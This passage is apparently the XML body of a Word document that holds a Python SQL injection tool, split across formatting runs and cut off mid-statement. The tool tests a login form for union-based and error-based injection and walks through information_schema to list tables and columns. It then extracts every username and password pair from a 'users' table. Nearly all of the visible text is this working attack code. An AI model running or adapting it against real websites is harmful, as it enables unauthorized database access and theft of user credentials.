    <w:p w14:paraId="0C6F215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1E5E6FC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"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": "-admin" + symbol + "hacking___",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F2099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0B66D4D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02FF7CD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1E661EC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spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>result.find</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>('MySQL') != -1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB8634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'MySQL'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C4C21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215650B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'Cannot get database'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0763089F" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D4E7F92" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4780ECA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table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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380318E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69E05BF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"-admin" + symbol + ' union select ',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F3610F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3834B61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593A16D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248C61A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index:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="388AE1B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'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>)' + ','</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4301FD1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i == flag - 1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E579D3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) + ' from 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tables</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> where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database() #'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42365D5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else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA75B5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41692F0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7B3D8EA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0397AE7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6D0BB0A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content = str(fonts[3].text)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7485498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turn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0])[1].split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1])[0]  #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38622C30" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2946022F" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DCE894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column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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77748E0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4D7A8A4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"-admin" + symbol + " union select ",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71177B8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2CEA59D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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35861DC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7530E80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704250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index:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B07BD2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'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column_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>)' + ','</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F0549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i == flag - 1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E8F88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) + ' from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>information_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>schema.columns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> where ' \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C92E8D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                     '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>table_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">=\'users\' and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>table_schema</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>database(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>)#'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AFBA13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else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42640F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13B733E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764EFE2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4F792B2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767A7E3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 = str(fonts[3].text)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5449038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0])[1].split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1])[0]  #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10187210" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14DC8F81" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C7A0A7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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F0B02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data = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA2AD1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: "-admin" + symbol + " union select ",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D7654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'passwd': 'admin'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D54724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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB053A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6685E2F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in </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>range(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>1, flag):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3960171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if 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 xml:space="preserve"> == index:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3662712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'</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>group_concat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(username,0x3</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>a,password</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>)' + ','</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="799C781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i == flag - 1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B781F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 from users#'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5501AD6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else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C655B7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    data['</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>uname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'] += str(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>) + ','</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17731DC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sult = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>send_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>reques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data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3649451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soup = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>BeautifulSoup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>result, '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>html.parser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33EB496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nts = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>soup.find</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>_all</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>('font')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="646B14E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ntent = str(fonts[3].text)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B0D0B9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return </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>content.split</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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0])[1].split(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[1])[0].split(',')  # #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E82E332" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E52BD52" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0735C98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def </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>do_injection_pos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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3582337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result, symbol = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>can_inject</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EFD1EC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not result:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F922A6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')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1572A70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else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A7DEAE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lastRenderedPageBreak/>
        <w:t xml:space="preserve">        if </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>symbol.find</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">('"') or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>symbol.find</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>("'") != -1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA90DA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Test Order By And Union Select........')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7CF3C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flag = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>test_order_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>by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17A0800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if </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>flag !</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>= '0':</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="035CF7A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test_union_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>select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flag)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2096348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base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base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3D6953D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version = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>exec_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>functio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, 'version()')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC144A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his_database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exec_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>function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, 'database()')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D749330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Success -&gt; ' + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>database.strip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">() + ' ' + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>version.strip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3F7952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Database -&gt; ' + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>this_database.strip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1E136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tables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table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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EDA7337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Tables -&gt; ' + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>tables.strip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D82CBE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Default Use Table users......')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD6908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umns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columns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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B744D76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Columns -&gt; ' + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>columns.strip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77CC7258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Try to get Data........\n\n')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="794B88E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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>get_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>data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 xml:space="preserve">, symbol, flag, index, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>temp_list</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D1397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temp = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>columns.split</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(',')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3296D28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%-12s%-12s' % (temp[1], temp[2]))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F16D99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meta in data:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA61BD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temp = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>meta.split</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(':')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21870AD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%-12s%-12s' % (temp[0], temp[1]))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B74D4B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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>elif</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> flag == '0':</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171D0DC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Start to use error-based injection...')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A5D1A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base = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>get_database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0469998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version = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>exec_function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'version()')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="623405BE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spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>this_database</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>exec_function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, 'database()')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00CD363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Success -&gt; ' + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>database.strip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">() + ' ' + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>version.strip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA5E745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Database -&gt; ' + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>this_database.strip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A6359C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tables = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>get_tables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3163640F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Tables -&gt; ' + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>tables.strip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D026ABD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Default Use Table users......')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C5C5F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columns = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>get_columns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6E47EDB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 xml:space="preserve">'Columns -&gt; ' + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>columns.strip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5876873A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log(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'Try to get Data........\n\n')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="562E9383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data = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>get_data_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>err</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>, symbol)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53DDE174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>'%-12s%-12s' % ('username', 'password'))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="021F0951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for un, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>pwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>data.items</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB52AA9" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>print(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
